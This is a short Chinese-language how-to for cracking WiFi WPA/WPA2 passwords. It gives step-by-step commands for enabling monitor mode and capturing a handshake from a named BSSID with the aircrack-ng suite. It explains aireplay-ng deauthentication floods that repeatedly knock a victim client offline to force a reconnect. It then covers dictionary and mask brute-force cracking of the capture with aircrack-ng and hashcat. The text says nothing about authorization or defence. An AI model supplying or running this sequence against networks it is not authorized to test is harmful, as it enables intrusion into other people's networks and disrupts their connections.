airmon-ng抓取握手包实现wifi密码破解

抓取握手包 

airmon-ng start wlan0          启动网卡 #stop 参数关闭
 airodump-ng wlan0mon       搜索周围wifi  

airodump-ng -c 9 --bssid 5C:54:6D:5F:90:6C -w /root/zhongzhuan/ wlan0mon #-c 9信道, -w握手包保存路径

 

如果抓取不到握手包使用以下命令

airodump-ng wlan0mon -c 1  切到1信道

aireplay-ng -0 50 -a  5C:54:6D:5F:90:6C  -c 92:C1:35:98:4D:00 wlan0mon

（使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器）
-0 冲突模式，后面跟发送次数（设置为0，则为循环攻击，不停的断开连接，客户端无法正常上网）强制使对方连接断开，不得不重新连接
-a 指定路由器的BSSID
-c 指定强制断开的设备

---

 

后面是获取到握手包的破解(aircrack-ng和hashcat)

aircrack-ng:

aircrack-ng -w /root/zhongzhuan/1.txt /root/zhongzhuan/zue-01.cap #这个aircrack-ng比较慢 -w 字典 握手包

hashcat:hashcat hcxpcapngtool - advanced password recovery

D:\hashcat-6.2.6>hashcat -m 22000 -a 0 96394_1689946034.hc22000 de.txt

命令：hashcat.exe -m 2500 -a 3 wpahash.haccpx ?a?a?a?a?a?a?a?a --deprecated-check-disable #-m 破解类型(wpa/wpa2)  -a 掩码暴力破解 后面的格式 表示密码的位数